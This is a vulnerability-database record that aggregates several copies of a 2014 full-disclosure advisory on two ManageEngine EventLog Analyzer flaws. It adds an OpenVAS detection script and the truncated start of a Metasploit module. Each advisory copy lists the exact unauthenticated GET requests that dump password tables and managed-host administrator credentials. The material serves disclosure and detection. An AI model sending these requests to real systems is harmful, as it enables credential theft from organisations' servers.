few days [2]. \n \nI'm releasing these as a 0 day since it's been 70 days since I \ninformed ManageEngine of this vulnerability and they have been \ntwiddling their thumbs ever since. The last update I got was that they \nwere \"working on fixing it but couldn't commit to a date; the \ntentative date is end of the year\". \nSince they have been vulnerable to a more serious remote code \nexecution 0 day for 67 days now (see [3]), I'm not holding this any \nlonger. \n \nDetails and timeline of disclosure are below, and a copy of this \nadvisory can be found at my repo [4]. \n \nRegards, \nPedro \n \n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 05/11/2014 / Last updated: 05/11/2014 \n \n>> Background on the affected product: \n\"EventLog Analyzer provides the most cost-effective Security \nInformation and Event Management (SIEM) software on the market. Using \nthis Log Analyzer software, organizations can automate the entire \nprocess of managing terabytes of machine generated logs by collecting, \nanalyzing, correlating, searching, reporting, and archiving from one \ncentral location. This event log analyzer software helps to monitor \nfile integrity, conduct log forensics analysis, monitor privileged \nusers and comply to different compliance regulatory bodies by \nintelligently analyzing your logs and instantly generating a variety \nof reports like user activity reports, historical trend reports, and \nmore.\" \n \nA Metasploit exploit that abuses these two vulnerabilities to obtain \nthe managed device superuser credentials has been released. \n \n#1 \nVulnerability: SQL database information disclosure (read any table in \nthe database) \nCVE-2014-6038 \nConstraints: none; no authentication or any other information needed. \nOn v7 the url has to be prepended with /event/. \nAffected versions: all versions from v7 to v9.9 build 9002. \n \nGET /agentHandler?mode=getTableData&table=[tableName] \nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins \nGET /agentHandler?mode=getTableData&table=AaaPassword --> user \npasswords (MD5 hashed) and salts \nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user \npassword hints \nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / \nAS/400 managed hosts Administrator usernames and passwords (XOR'ed \nwith 0x30) \n \n \n#2 \nVulnerability: Windows / AS/400 managed hosts Administrator \ncredentials disclosure \nCVE-2014-6039 \nConstraints: none; no authentication or any other information needed. \nOn v7 the url has to be prepended with /event/. \nAffected versions: all versions from v7 to v9.9 build 9002. \n \nGET /hostdetails?slid=X&hostid=Y \nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser \nusername and password (XOR'ed with 0x30 and base64 encoded) \n \n \n>> Fix: \nUNFIXED - ManageEngine failed to take action after 70 days. \n \nTimeline of disclosure: \n28/08/2014 \n- Requested contact to email via ManageEngine Security Response Center \n- Received email from support and sent details about the \nvulnerabilities above and a third vulnerability (remote code execution \nvia file upload). \n \n28/08/2014 \n- ManageEngine acknowledge the receipt and promise to keep me informed \nof the progress. \n \n31/08/2014 \n- hong10 releases details about the remote code execution via file \nupload vulnerability which I had discovered. Apparently he discovered \nand communicated it to ManageEngine over a year ago and no action had \nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86). \n- I ask ManageEngine why I hadn't been informed that one of my \nvulnerabilities had already been disclosed to them over a year ago. \nThey respond with \"We appreciate your efforts and will fix your \nvulnerabilities, please bear with us\". \n- With hong10's support, I release an exploit for the remote code \nexecution vulnerability (see \nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the \nvulnerability information from this report since it has already been \ndiscovered and disclosed by hong10. \n \n11/09/2014 \n- Asked for an update on progress. Received a response a day after \n\"the development team will include the fix in our next release\". \n \n13/10/2014 \n- Asked for an update on progress. No response. \n \n17/10/2014 \n- Informed ManageEngine that will release details and an exploit the \nnext day if no reply is received. \n \n19/10/2014 \n- Attempted escalation via the project manager for Desktop Central. \nEventLog support team replies on the next day apologising for not \nresponding and saying will get back to me as soon as possible. \n \n05/11/2014 \n- Informed EventLog support that would release details and exploit \ntoday. Received reply stating \"we are working on this but cannot \ncommit to a date; the new version has a tentative release date of end \nof quarter\". \n- Released advisory and exploit 70 days after initial contact \n(interesting fact: it's been 67 days since the release of my exploit \nfor hong10's vulnerability and EventLog Analyzer is still vulnerable \nto remote code execution). \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4137 \n \n[3] \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \n \n[4] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/128996/manageengineea-disclose.txt"}], "zdt": [{"lastseen": "2018-01-03T01:00:04", "bulletinFamily": "exploit", "description": "ManageEngine EventLog Analyzer suffers from SQL information and credential disclosure vulnerabilities.", "modified": "2014-11-06T00:00:00", "published": "2014-11-06T00:00:00", "id": "1337DAY-ID-22829", "href": "https://0day.today/exploit/description/22829", "type": "zdt", "title": "ManageEngine EventLog Analyzer SQL / Credential Disclosure", "sourceData": "This is the 6th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be\r\nabused to dump information from the database and obtain the superuser\r\ncredentials for Windows and AS/400 hosts which are managed by EventLog\r\nAnalyzer. A Metasploit module has also been released and should be\r\nintegrated in the framework in the next few days [2].\r\n\r\nI'm releasing these as a 0 day since it's been 70 days since I\r\ninformed ManageEngine of this vulnerability and they have been\r\ntwiddling their thumbs ever since. The last update I got was that they\r\nwere \"working on fixing it but couldn't commit to a date; the\r\ntentative date is end of the year\".\r\nSince they have been vulnerable to a more serious remote code\r\nexecution 0 day for 67 days now (see [3]), I'm not holding this any\r\nlonger.\r\n\r\nDetails and timeline of disclosure are below, and a copy of this\r\nadvisory can be found at my repo [4].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security\r\nInformation and Event Management (SIEM) software on the market. Using\r\nthis Log Analyzer software, organizations can automate the entire\r\nprocess of managing terabytes of machine generated logs by collecting,\r\nanalyzing, correlating, searching, reporting, and archiving from one\r\ncentral location. This event log analyzer software helps to monitor\r\nfile integrity, conduct log forensics analysis, monitor privileged\r\nusers and comply to different compliance regulatory bodies by\r\nintelligently analyzing your logs and instantly generating a variety\r\nof reports like user activity reports, historical trend reports, and\r\nmore.\"\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain\r\nthe managed device superuser credentials has been released.\r\n\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in\r\nthe database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user\r\npasswords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user\r\npassword hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows /\r\nAS/400 managed hosts Administrator usernames and passwords (XOR'ed\r\nwith 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator\r\ncredentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser\r\nusername and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014\r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the\r\nvulnerabilities above and a third vulnerability (remote code execution\r\nvia file upload).\r\n\r\n28/08/2014\r\n- ManageEngine acknowledge the receipt and promise to keep me informed\r\nof the progress.\r\n\r\n31/08/2014\r\n- hong10 releases details about the remote code execution via file\r\nupload vulnerability which I had discovered. Apparently he discovered\r\nand communicated it to ManageEngine over a year ago and no action had\r\nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my\r\nvulnerabilities had already been disclosed to them over a year ago.\r\nThey respond with \"We appreciate your efforts and will fix your\r\nvulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code\r\nexecution vulnerability (see\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the\r\nvulnerability information from this report since it has already been\r\ndiscovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after\r\n\"the development team will include the fix in our next release\".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the\r\nnext day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central.\r\nEventLog support team replies on the next day apologising for not\r\nresponding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit\r\ntoday. Received reply stating \"we are working on this but cannot\r\ncommit to a date; the new version has a tentative release date of end\r\nof quarter\".\r\n- Released advisory and exploit 70 days after initial contact\r\n(interesting fact: it's been 67 days since the release of my exploit\r\nfor hong10's vulnerability and EventLog Analyzer is still vulnerable\r\nto remote code execution).\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/22829"}, {"lastseen": "2018-04-08T23:42:43", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2018-01-26T00:00:00", "published": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29644", "id": "1337DAY-ID-29644", "type": "zdt", "title": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)", "sourceData": ">> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n \r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in the database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n \r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)\r\n \r\n \r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n \r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)\r\n \r\n \r\nA Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.\r\n \r\n \r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n \r\nTimeline of disclosure:\r\n28/08/2014 \r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).\r\n \r\n28/08/2014 \r\n- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.\r\n \r\n31/08/2014 \r\n- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with \"We appreciate your efforts and will fix your vulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.\r\n \r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after \"the development team will include the fix in our next release\".\r\n \r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n \r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the next day if no reply is received.\r\n \r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.\r\n \r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit today. Received reply stating \"we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter\".\r\n- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).\r\n \r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-04-08] #", "sourceHref": "https://0day.today/exploit/29644", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-01-25T18:52:47", "bulletinFamily": "exploit", "description": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2). CVE-2014-6038,CVE-2014-6039. Webapps exploit for Multiple platform", "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "EDB-ID:43893", "href": "https://www.exploit-db.com/exploits/43893/", "type": "exploitdb", "title": "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)", "sourceData": ">> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n\"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in the database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released.\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014 \r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload).\r\n \r\n28/08/2014 \r\n- ManageEngine acknowledge the receipt and promise to keep me informed of the progress.\r\n \r\n31/08/2014 \r\n- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with \"We appreciate your efforts and will fix your vulnerabilities, please bear with us\".\r\n- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after \"the development team will include the fix in our next release\".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the next day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit today. Received reply stating \"we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter\".\r\n- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).\r\n\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43893/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\nHi,\r\n\r\nThis is the 6th part of the ManageOwnage series. For previous parts see [1].\r\n\r\nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be\r\nabused to dump information from the database and obtain the superuser\r\ncredentials for Windows and AS/400 hosts which are managed by EventLog\r\nAnalyzer. A Metasploit module has also been released and should be\r\nintegrated in the framework in the next few days [2].\r\n\r\nI'm releasing these as a 0 day since it's been 70 days since I\r\ninformed ManageEngine of this vulnerability and they have been\r\ntwiddling their thumbs ever since. The last update I got was that they\r\nwere "working on fixing it but couldn't commit to a date; the\r\ntentative date is end of the year".\r\nSince they have been vulnerable to a more serious remote code\r\nexecution 0 day for 67 days now (see [3]), I'm not holding this any\r\nlonger.\r\n\r\nDetails and timeline of disclosure are below, and a copy of this\r\nadvisory can be found at my repo [4].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Multiple vulnerabilities in ManageEngine EventLog Analyzer\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 05/11/2014 / Last updated: 05/11/2014\r\n\r\n>> Background on the affected product:\r\n"EventLog Analyzer provides the most cost-effective Security\r\nInformation and Event Management (SIEM) software on the market. Using\r\nthis Log Analyzer software, organizations can automate the entire\r\nprocess of managing terabytes of machine generated logs by collecting,\r\nanalyzing, correlating, searching, reporting, and archiving from one\r\ncentral location. This event log analyzer software helps to monitor\r\nfile integrity, conduct log forensics analysis, monitor privileged\r\nusers and comply to different compliance regulatory bodies by\r\nintelligently analyzing your logs and instantly generating a variety\r\nof reports like user activity reports, historical trend reports, and\r\nmore."\r\n\r\nA Metasploit exploit that abuses these two vulnerabilities to obtain\r\nthe managed device superuser credentials has been released.\r\n\r\n#1\r\nVulnerability: SQL database information disclosure (read any table in\r\nthe database)\r\nCVE-2014-6038\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /agentHandler?mode=getTableData&table=[tableName]\r\nGET /agentHandler?mode=getTableData&table=AaaUser --> user logins\r\nGET /agentHandler?mode=getTableData&table=AaaPassword --> user\r\npasswords (MD5 hashed) and salts\r\nGET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user\r\npassword hints\r\nGET /agentHandler?mode=getTableData&table=HostDetails --> Windows /\r\nAS/400 managed hosts Administrator usernames and passwords (XOR'ed\r\nwith 0x30)\r\n\r\n\r\n#2\r\nVulnerability: Windows / AS/400 managed hosts Administrator\r\ncredentials disclosure\r\nCVE-2014-6039\r\nConstraints: none; no authentication or any other information needed.\r\nOn v7 the url has to be prepended with /event/.\r\nAffected versions: all versions from v7 to v9.9 build 9002.\r\n\r\nGET /hostdetails?slid=X&hostid=Y\r\nGET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser\r\nusername and password (XOR'ed with 0x30 and base64 encoded)\r\n\r\n\r\n>> Fix:\r\nUNFIXED - ManageEngine failed to take action after 70 days.\r\n\r\nTimeline of disclosure:\r\n28/08/2014\r\n- Requested contact to email via ManageEngine Security Response Center\r\n- Received email from support and sent details about the\r\nvulnerabilities above and a third vulnerability (remote code execution\r\nvia file upload).\r\n\r\n28/08/2014\r\n- ManageEngine acknowledge the receipt and promise to keep me informed\r\nof the progress.\r\n\r\n31/08/2014\r\n- hong10 releases details about the remote code execution via file\r\nupload vulnerability which I had discovered. Apparently he discovered\r\nand communicated it to ManageEngine over a year ago and no action had\r\nbeen taken (see http://seclists.org/fulldisclosure/2014/Aug/86).\r\n- I ask ManageEngine why I hadn't been informed that one of my\r\nvulnerabilities had already been disclosed to them over a year ago.\r\nThey respond with "We appreciate your efforts and will fix your\r\nvulnerabilities, please bear with us".\r\n- With hong10's support, I release an exploit for the remote code\r\nexecution vulnerability (see\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88). I also remove the\r\nvulnerability information from this report since it has already been\r\ndiscovered and disclosed by hong10.\r\n\r\n11/09/2014\r\n- Asked for an update on progress. Received a response a day after\r\n"the development team will include the fix in our next release".\r\n\r\n13/10/2014\r\n- Asked for an update on progress. No response.\r\n\r\n17/10/2014\r\n- Informed ManageEngine that will release details and an exploit the\r\nnext day if no reply is received.\r\n\r\n19/10/2014\r\n- Attempted escalation via the project manager for Desktop Central.\r\nEventLog support team replies on the next day apologising for not\r\nresponding and saying will get back to me as soon as possible.\r\n\r\n05/11/2014\r\n- Informed EventLog support that would release details and exploit\r\ntoday. Received reply stating "we are working on this but cannot\r\ncommit to a date; the new version has a tentative release date of end\r\nof quarter".\r\n- Released advisory and exploit 70 days after initial contact\r\n(interesting fact: it's been 67 days since the release of my exploit\r\nfor hong10's vulnerability and EventLog Analyzer is still vulnerable\r\nto remote code execution).\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4137\r\n\r\n[3]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\n\r\n[4]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt\r\n\r\n", "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31449", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31449", "title": "[The ManageOwnage Series, part VI]: 0day database info and superuser credential disclosure in EventLog Analyser", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14113", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14113", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:41:02", "bulletinFamily": "scanner", "description": "ManageEngine EventLog Analyzer is prone to an information disclosure vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2014-11-06T00:00:00", "id": "OPENVAS:1361412562310105111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105111", "title": "ManageEngine EventLog Analyzer Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_managed_engine_eventlog_analyzer_11_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# ManageEngine EventLog Analyzer Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:zohocorp:manageengine_eventlog_analyzer';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105111\");\n script_cve_id(\"CVE-2014-6038\", \"CVE-2014-6039\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ManageEngine EventLog Analyzer Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue could allow an attacker read usernames and passwords.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a HTTP GET request and check the response.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"affected\", value:\"all versions from v7 to v9.9 build 9002.\");\n script_tag(name:\"summary\", value:\"ManageEngine EventLog Analyzer is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-06 16:38:34 +0100 (Thu, 06 Nov 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_manageengine_eventlog_analyzer_detect.nasl\");\n script_mandatory_keys(\"me_eventlog_analyzer/installed\");\n script_require_ports(\"Services/www\", 8400);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(cpe: CPE, port: port, nofork: TRUE))\n exit(0);\n\nurl = '/agentHandler?mode=getTableData&table=AaaPassword';\n\nif (http_vuln_check(port: port, url: url, pattern: \"AaaPassword createdtime\",\n extra_check: make_list(\"password\", \"password_id\", \"salt\"))) {\n report = report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-11-28T18:15:07", "bulletinFamily": "exploit", "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7, the TARGETURI has to be prepended with /event.\n", "modified": "2018-09-15T23:54:45", "published": "2014-11-05T20:12:03", "id": "MSF:AUXILIARY/GATHER/EVENTLOG_CRED_DISCLOSURE", "href": "", "type": "metasploit", "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\n 'Description' => %q{\n 